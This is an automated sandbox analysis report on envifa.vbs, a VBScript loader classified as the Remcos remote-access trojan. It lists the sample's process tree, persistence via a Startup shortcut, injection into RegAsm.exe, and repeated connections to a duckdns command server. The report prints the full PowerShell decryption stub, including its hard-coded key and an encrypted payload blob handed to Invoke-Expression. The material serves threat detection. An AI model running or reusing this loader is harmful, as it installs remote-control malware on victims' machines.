Analysis Overview
SHA256
043ca2ac861326e01d02af9599b54c8a23b781dda3e9f3c31166885a1f67e401
Threat Level: Known bad
The file envifa.vbs was found to be: Known bad. In the Windows 10 runs it behaves as a VBScript loader: WScript.exe launches powershell.exe with an inline stub that derives an AES-256-CBC key by SHA-256-hashing the hard-coded string '58417081275505453806', Base64-decodes an embedded blob (first 16 bytes used as IV), decrypts it and hands the plaintext to Invoke-Expression. The PowerShell stage then contacts paste.ee and cdn.discordapp.com, copies the script to C:\ProgramData\google.vbs and drops a Startup-folder google.lnk for persistence, and uses SetThreadContext to inject into RegAsm.exe; the sandbox subsequently records repeated connections to remccoss2023.duckdns.org (181.142.162.155:4576) and the creation of C:\ProgramData\remcos\registros.dat, consistent with the Remcos classification.
Malicious Activity Summary
Remcos
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-05 18:38
Signatures
Analysis: behavioral1 (Windows 7 run — only WScript.exe and the first powershell.exe stage were observed, with no RegAsm.exe child, no Remcos signature and no network activity recorded; the chain apparently did not progress on this platform, so this run alone under-reports the sample)
Detonation Overview
Submitted
2023-12-05 18:38
Reported
2023-12-05 18:44
Platform
win7-20231023-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2720 wrote to memory of 2992 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2720 wrote to memory of 2992 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2720 wrote to memory of 2992 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
Network
Files
memory/2992-4-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp
memory/2992-7-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2992-6-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-5-0x000000001B1A0000-0x000000001B482000-memory.dmp
memory/2992-8-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp
memory/2992-10-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-9-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-11-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-12-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-13-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-05 18:38
Reported
2023-12-05 18:44
Platform
win10-20231025-en
Max time kernel
290s
Max time network
295s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2916 set thread context of 4172 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 188.114.97.0:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 155.162.142.181.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 155.162.142.181.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 13.73.50.20.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 128.99.217.23.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
Files
memory/2916-4-0x00000237E6750000-0x00000237E6772000-memory.dmp
memory/2916-5-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp
memory/2916-7-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp
memory/2916-9-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp
memory/2916-10-0x00000237FEB40000-0x00000237FEBB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zv00cg1g.res.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2916-25-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp
memory/2916-26-0x0000023780000000-0x00000237807A6000-memory.dmp
memory/2916-29-0x00000237FEBC0000-0x00000237FEBCC000-memory.dmp
memory/2916-34-0x0000023FFF520000-0x0000023FFF53E000-memory.dmp
memory/3172-37-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp
memory/3172-40-0x000001B32D730000-0x000001B32D740000-memory.dmp
memory/3172-41-0x000001B32D730000-0x000001B32D740000-memory.dmp
memory/4172-60-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3172-61-0x000001B32D730000-0x000001B32D740000-memory.dmp
memory/4172-68-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3172-70-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
